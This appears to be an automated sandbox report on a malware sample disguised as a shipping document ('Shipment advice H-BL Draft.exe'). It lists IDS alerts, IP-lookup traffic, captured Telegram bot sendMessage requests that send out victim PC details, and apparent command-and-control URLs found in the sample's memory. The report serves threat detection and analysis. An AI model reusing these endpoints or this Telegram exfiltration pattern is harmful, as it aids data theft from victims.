                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49751 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49755 -> 149.154.167.220:443
                    Uses the Telegram API (likely for C&C communication)
                    Source: unknownDNS query: name: api.telegram.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:704672%0D%0ADate%20and%20Time:%2009/03/2025%20/%2004:02:30%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20704672%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:704672%0D%0ADate%20and%20Time:%2009/03/2025%20/%2003:29:33%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20704672%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                    Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
                    Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
                    Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
                    Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: checkip.dyndns.org
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49716 -> 193.122.6.168:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49719 -> 193.122.6.168:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49724 -> 193.122.6.168:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49730 -> 193.122.6.168:80
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49727 -> 104.21.32.1:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49745 -> 104.21.32.1:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49747 -> 104.21.32.1:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49739 -> 104.21.32.1:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49726 -> 104.21.32.1:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49718 -> 104.21.32.1:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49741 -> 104.21.32.1:443
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49717 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49722 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49754 version: TLS 1.0
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:704672%0D%0ADate%20and%20Time:%2009/03/2025%20/%2004:02:30%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20704672%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:704672%0D%0ADate%20and%20Time:%2009/03/2025%20/%2003:29:33%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20704672%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                    Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 18:03:09 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 18:03:16 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1319618401.000000000498B000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 0000000E.00000002.1382016232.0000000004BCC000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3712537195.0000000000431000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1319618401.000000000498B000.00000004.00000800.00020000.00000000.sdmp, Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 0000000E.00000002.1382016232.0000000004BCC000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3712537195.0000000000431000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1319618401.000000000498B000.00000004.00000800.00020000.00000000.sdmp, Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 0000000E.00000002.1382016232.0000000004BCC000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3712537195.0000000000431000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                    Source: Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002FD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                    Source: Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002B52000.00000004.00000800.00020000.00000000.sdmp, Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002B64000.00000004.00000800.00020000.00000000.sdmp, Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002B72000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002FA3000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002F91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                    Source: Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002B52000.00000004.00000800.00020000.00000000.sdmp, Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002B64000.00000004.00000800.00020000.00000000.sdmp, Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002B72000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002FA3000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002F91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                    Source: Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002DE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1319618401.000000000498B000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 0000000E.00000002.1382016232.0000000004BCC000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3712537195.0000000000431000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                    Source: Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002B52000.00000004.00000800.00020000.00000000.sdmp, Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002B64000.00000004.00000800.00020000.00000000.sdmp, Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.0000000002B72000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002FA3000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002F91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1317035907.0000000003173000.00000004.00000800.00020000.00000000.sdmp, Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 0000000E.00000002.1378677101.00000000033B3000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002DE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1319618401.000000000498B000.00000004.00000800.00020000.00000000.sdmp, Shipment advice H-BL Draft.exe, 0000000D.00000002.3718301984.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 0000000E.00000002.1382016232.0000000004BCC000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002.3712537195.0000000000431000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1323341414.00000000073F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1323341414.00000000073F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1323341414.00000000073F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1323341414.00000000073F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1323341414.00000000073F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1323341414.00000000073F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1323341414.00000000073F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1323341414.00000000073F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1323341414.00000000073F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1323341414.00000000073F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1323341414.00000000073F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1323341414.00000000073F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1323341414.00000000073F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1323341414.00000000073F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1323341414.00000000073F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1323341414.00000000073F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1323341414.00000000073F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1323341414.00000000073F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1323341414.00000000073F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1323341414.00000000073F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1323341414.00000000073F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1323341414.00000000073F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1323341414.00000000073F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
